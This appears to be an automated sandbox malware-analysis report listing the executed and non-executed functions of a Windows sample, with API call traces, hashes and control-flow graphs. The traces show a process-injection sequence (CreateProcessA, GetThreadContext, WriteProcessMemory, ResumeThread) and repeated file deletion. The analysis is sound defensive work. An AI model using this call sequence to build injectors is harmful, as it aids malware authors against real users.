WriteProcessMemory 5553->5554 5554->5548 5555 2240ad4 ResumeThread 5554->5555 5556 2240ae5 Sleep OpenMutexA 5555->5556 5556->5550 5557 2240b0b 5556->5557 5557->5548 5557->5556 5562 2240b25 5558->5562 5561 2243689 5560->5561 5561->5547 5561->5561 5563 2240ce8 GetPEB 5562->5563 5564 2240b31 5563->5564 5569 2240b4b 5564->5569 5566 2240b44 5575 2240b89 5566->5575 5570 2243677 5569->5570 5571 2240b50 LoadLibraryA 5570->5571 5572 2240b66 5571->5572 5573 2240b89 5 API calls 5572->5573 5574 2240b7b 5572->5574 5573->5574 5574->5566 5577 2240b8e 5575->5577 5576 2240bd0 5585 22408d7 5576->5585 5577->5576 5579 2240ba1 OpenProcess 5577->5579 5579->5576 5582 2240bb2 5579->5582 5582->5576 5583 2240bc8 ExitProcess 5582->5583 5588 22408dd 5585->5588 5592 22408fd 5588->5592 5593 2240ce8 GetPEB 5592->5593 5595 2240909 5593->5595 5596 2240962 5595->5596 5597 2240ce8 GetPEB 5596->5597 5598 224096e 5597->5598 5599 2240978 Sleep RtlExitUserThread 5598->5599 5956 2240b8f 5957 2240ba1 OpenProcess 5956->5957 5958 2240bd0 5957->5958 5961 2240bb2 5957->5961 5959 22408d7 3 API calls 5958->5959 5960 2240bd5 5959->5960 5962 2240c63 GetPEB 5960->5962 5961->5958 5963 2240bc8 ExitProcess 5961->5963 5964 2240bda 5962->5964 5686 1c292d 5687 1c3653 5686->5687 5688 1c2932 LoadLibraryA 5687->5688 5689 1c2948 5688->5689 5690 1c2961 VirtualAlloc 5689->5690 5690->5690 5691 1c2979 5690->5691 5709 1c29a6 5691->5709 5710 1c3653 5709->5710 5711 1c29ab lstrcat 5710->5711 5712 1c29c1 5711->5712 5726 1c29dd 5712->5726 5727 1c3653 5726->5727 5728 1c29e2 lstrcat 5727->5728 5729 1c29f8 5728->5729 5739 1c2a14 5729->5739 5740 1c3653 5739->5740 5741 1c2a19 lstrcat 5740->5741 5744 1c2a20 5741->5744 5743 1c2a8a DeleteFileA 5743->5744 5744->5743 5745 1c2ace DeleteFileA 5744->5745 5746 1c2b34 Sleep 5744->5746 5747 1c2b1e DeleteFileA 5744->5747 5748 1c2b4d 5744->5748 5745->5744 5746->5744 5747->5746 5750 1c2b5e 5748->5750 5749 1c2c41 Sleep 5749->5749 5749->5750 5750->5749 5752 1c2cf7 5750->5752 5753 1c2c99 5750->5753 5752->5744 5756 1c2b5e 5753->5756 5754 1c2cf7 5754->5750 5755 1c2c41 Sleep 5755->5755 5755->5756 5756->5753 5756->5754 5756->5755 5891 1c0b6b GetWindowThreadProcessId OpenProcess 5892 1c0bac 5891->5892 5895 1c0b8e 5891->5895 5893 1c08b3 29 API calls 5892->5893 5894 1c0bb1 5893->5894 5896 1c0c3f GetPEB 5894->5896 5895->5892 5897 1c0ba4 ExitProcess 5895->5897 5898 1c0bb6 5896->5898 5757 1c4d25 5758 1c4d4e 5757->5758 5759 1c4d32 5757->5759 5759->5758 5760 1c4d44 SetEvent 5759->5760 5760->5758

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 02240005 Relevance: 2.6, APIs: 1, Instructions: 1116COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0224098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 022409A5
                                                                                                                                                                            • Part of subcall function 0224098B: GetStartupInfoA.KERNEL32(00000000), ref: 022409BD
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0224001D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitInfoMutexOpenProcessStartup
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 213680645-0
                                                                                                                                                                          • Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                          • Instruction ID: 5b7b2d51848ce7e6328a828d32556596b20594477a9bdb1ff08d41b4b3de3153
                                                                                                                                                                          • Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 4F72E36142D3C14FD71F9BE04A64A657F79BF03208B0910CBD7829E0BBDE645B89C76A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00860000 Relevance: 21.4, APIs: 3, Strings: 9, Instructions: 395memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1889756937.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_860000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                          • String ID: $1;$@$C[$R$d:$wJ$y7$v
                                                                                                                                                                          • API String ID: 544645111-3459585926
                                                                                                                                                                          • Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                          • Instruction ID: 89b1cf9ac7d55759214d386de343b6a22f623a7ff95fd0c0b6acfd6c7340367f
                                                                                                                                                                          • Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                          • Instruction Fuzzy Hash: CB327774E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341DB756E85CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C093E Relevance: 18.1, APIs: 12, Instructions: 134sleepthreadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 001C0959
                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 001C0961
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0981
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 001C0999
                                                                                                                                                                            • Part of subcall function 001C09D9: CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                            • Part of subcall function 001C09D9: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                            • Part of subcall function 001C09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                            • Part of subcall function 001C09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                            • Part of subcall function 001C09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                            • Part of subcall function 001C09D9: ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                            • Part of subcall function 001C09D9: Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                            • Part of subcall function 001C09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1099281029-0
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: 02247e30dbf509db19e564959b2d0d53da4b464b58ceeb9d9e50b48634e6cc8b
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: E7517031644354AFEF239F20CC85F9A77B8AF14B44F040199BA49FE0D6DBB0DA94CA65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C3F0D Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                          • Sleep.KERNELBASE(000003E8,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F4B
                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 001C3F5B
                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 001C3F6B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction ID: 634a74a46434a642e0226302b98b7da89e65e1ed753664d014aab6768df5a327
                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction Fuzzy Hash: EFF05E60988244A6EF413BB0884AF4D36B45F31705F04889CBA59E90D2CF30C6508E72
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C1345 Relevance: 4.6, APIs: 3, Instructions: 61memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 53 1c1345-1c1352 54 1c1358-1c135e 53->54 55 1c13eb-1c13ec 53->55 54->55 56 1c1364-1c137a VirtualProtect 54->56 56->55 57 1c137c-1c138f VirtualAlloc 56->57 57->57 58 1c1391-1c1398 57->58 59 1c139b-1c13ab call 1c0e7c 58->59 62 1c13ad-1c13e5 VirtualProtect 59->62 62->55
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 001C1372
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 001C13E5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: 24bdabae7abb68ff9a17f5ee70b33f63d9b304115b88680595e81b57cc4b6d8c
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: C921AE31944256AFDB11DE78C844B5DBBB5AF05310F054219F955BB5D5D730E800CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02243409 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 511 2243409-2243462 GetVolumeInformationA call 2243634
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVolumeInformationA.KERNELBASE(02243405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02243409
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                          • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                          • Instruction ID: 5f3f8e9eaef86f97a9afefb94e7c3f463a3fda40d11c3e19baa803bc22c4bee9
                                                                                                                                                                          • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                          • Instruction Fuzzy Hash: 45F0FE75500154DBEF02EF64C485A9A77F8AF44344F4504C8AA4DBF206CA709555CFA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 02242951 Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(02242949,00000008,?,00000000,02242835,00000000), ref: 02242956
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02242993
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022429C1), ref: 022429D0
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022429F8), ref: 02242A07
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02242A2F), ref: 02242A3E
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AB8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02242B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02242B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction ID: 702ab94aa2107b7d8bbc356e04f12854a57921480221bcbfcca8de3264b3a6a9
                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction Fuzzy Hash: A5517371410314DEDB2AAFB18D48FAB77BDEF40704F4405A6BE85EA059DF349680CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C292D Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 554 1c292d-1c2943 call 1c3653 LoadLibraryA call 1c0c9c 558 1c2948-1c295f 554->558 560 1c2961-1c2977 VirtualAlloc 558->560 560->560 561 1c2979-1c299f call 1c25e8 call 1c29a6 560->561 566 1c2a07-1c2a1a call 1c3653 lstrcat 561->566 567 1c29a1-1c2a06 call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 561->567 574 1c2a20-1c2a43 call 1c2b4d call 1c34f7 566->574 567->566 583 1c2a48-1c2a4f 574->583 583->574 585 1c2a51-1c2a6d call 1c343f call 1c2683 583->585 594 1c2a6f 585->594 595 1c2a9a-1c2ab1 call 1c2683 585->595 594->595 596 1c2a71-1c2a86 call 1c26f9 594->596 601 1c2ade-1c2af5 call 1c2683 595->601 602 1c2ab3 595->602 596->595 604 1c2a88 596->604 609 1c2af8-1c2b11 call 1c2e97 601->609 610 1c2af7 601->610 602->601 605 1c2ab5-1c2aca call 1c26f9 602->605 604->595 607 1c2a8a-1c2a94 DeleteFileA 604->607 605->601 613 1c2acc 605->613 607->595 616 1c2b34-1c2b48 Sleep 609->616 617 1c2b13-1c2b1c call 1c3057 609->617 610->609 613->601 615 1c2ace-1c2ad8 DeleteFileA 613->615 615->601 616->583 617->616 620 1c2b1e-1c2b2e DeleteFileA 617->620 620->616
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(001C2925,00000008,?,00000000,001C2811,00000000), ref: 001C2932
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 001C296F
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction ID: 5e20f8d1fd77fe1a3bbaf27d3d0f84e3a94bc46b39ba8ee9e7a75b819cd3b3af
                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction Fuzzy Hash: 55513471500264AFDB227B608D49FAB77BCEF60705F0444AEFA45EB056DB74DA80CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 022409FD Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 703 22409fd-2240a0c call 2243677 CreateProcessA 706 2240b10 703->706 707 2240a12-2240a34 GetThreadContext 703->707 708 2240b15-2240b16 706->708 709 2240b10 call 2240b17 706->709 707->706 710 2240a3a-2240a5f VirtualProtectEx 707->710 709->708 710->706 711 2240a65-2240aa4 DuplicateHandle 710->711 711->706 712 2240aa6-2240ad2 WriteProcessMemory 711->712 712->706 713 2240ad4-2240ae0 ResumeThread 712->713 714 2240ae5-2240b09 Sleep OpenMutexA 713->714 714->708 715 2240b0b-2240b0e 714->715 715->706 715->714
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,022409F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02240A04
                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 02240A2C
                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02240A57
                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,02245834,00000000,00000000,00000002), ref: 02240A9C
                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02240ACA
                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 02240ADA
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 02240AEA
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02240B01
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction ID: 46eae0712bd63b703eaec20d4efdb4f34141fb0c34a24f6cfc54088de504fbd0
                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction Fuzzy Hash: CB3143316502159FEF2B5F50CC85BA977B8AF04788F0405D4AA49FE0E9DBB09A90CE54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C09D9 Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 689 1c09d9-1c09e8 call 1c3653 CreateProcessA 692 1c0aec call 1c0af3 689->692 693 1c09ee-1c0a10 GetThreadContext 689->693 696 1c0af1-1c0af2 692->696 693->692 695 1c0a16-1c0a3b VirtualProtectEx 693->695 695->692 697 1c0a3c-1c0a80 DuplicateHandle 695->697 697->692 699 1c0a82-1c0aae WriteProcessMemory 697->699 699->692 700 1c0ab0-1c0abc ResumeThread 699->700 701 1c0ac1-1c0ae5 Sleep OpenMutexA 700->701 701->696 702 1c0ae7-1c0aea 701->702 702->692 702->701
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction ID: d08d0b8b2051c34f5721e4dda066ff8a6639c36971b334a2f4be7756b07d5326
                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction Fuzzy Hash: F0312F31640215AFEF239F14CC85FAA77B8AF14744F080199AA49FE0E5DBB0DA90CE54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 022429CA Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022429C1), ref: 022429D0
                                                                                                                                                                            • Part of subcall function 02242A01: lstrcat.KERNEL32(00000000,022429F8), ref: 02242A07
                                                                                                                                                                            • Part of subcall function 02242A01: lstrcat.KERNEL32(00000000,02242A2F), ref: 02242A3E
                                                                                                                                                                            • Part of subcall function 02242A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AB8
                                                                                                                                                                            • Part of subcall function 02242A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02242B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02242B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                          • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction ID: c44fa0cd3f79ace4e58c5937ddb4e13988b62357f03d43d7a107e99f8183ce9a
                                                                                                                                                                          • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction Fuzzy Hash: BB413371410724DEDB2AAFB18D48FAB77BDEF40704F404696BE85EA059DE349680CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C29A6 Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
